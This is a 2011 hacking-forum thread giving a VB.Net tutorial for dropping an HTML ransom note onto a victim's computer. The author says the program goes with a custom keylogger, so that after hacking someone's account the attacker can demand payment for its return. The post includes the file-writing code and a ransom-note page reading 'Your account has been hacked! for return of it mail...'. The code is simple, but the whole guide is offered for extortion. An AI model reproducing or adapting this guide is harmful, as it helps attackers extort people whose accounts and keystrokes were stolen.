![]() |
|
[VB.Net] Make a HTML about page - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Visual Basic & .NET Framework (https://sinister.li/Forum-Visual-Basic-NET-Framework) +--- Thread: [VB.Net] Make a HTML about page (/Thread-VB-Net-Make-a-HTML-about-page) |
[VB.Net] Make a HTML about page - 1234hotmaster - 01-18-2011 Ok the first question is that WHY to even make a about page? answer: For example you have a custom keylogger which you made your self and don't want to use RAT's. When you hack the victim and want to make money out of it for returning his account well, he wont know how to contact you. you can make a About page in his computer to tell him how to contact you .Things you need:
First open your project or start a new one. you can put this in the form's load. so add a: Code: Imports system.ioabove Public Class Form1 Then add Code: Private sub form1_load handles mybase.loadNow you need to chose the location that the file is going to be created, So we are going to use a string dim. add this: Code: Dim location as string = "C:\About.html"( Note that the file can be .htm, .html, .asp and .txt :epic: ) Now in your form add a new Label ( i use labels ) and in the text field add this:Code: <html>
<title>You have been hacked!</title>
<body><center>
<p><font color="FF0000">Your account has been hacked! for return of it mail: any@any.com</font></center>
</body>
</html>Now below the dim location as string = "C:\About.html" add: Code: dim ftr As New FileStream(location, FileMode.Create, FileAccess.Write)
dim stw As New StreamWriter(ftr)
stw.BaseStream.Seek(0, SeekOrigin.End)
stw.Write(Label1.Text)
stw.Close()
End subAnd now you have an About page ![]() Hope this guide helped someone
|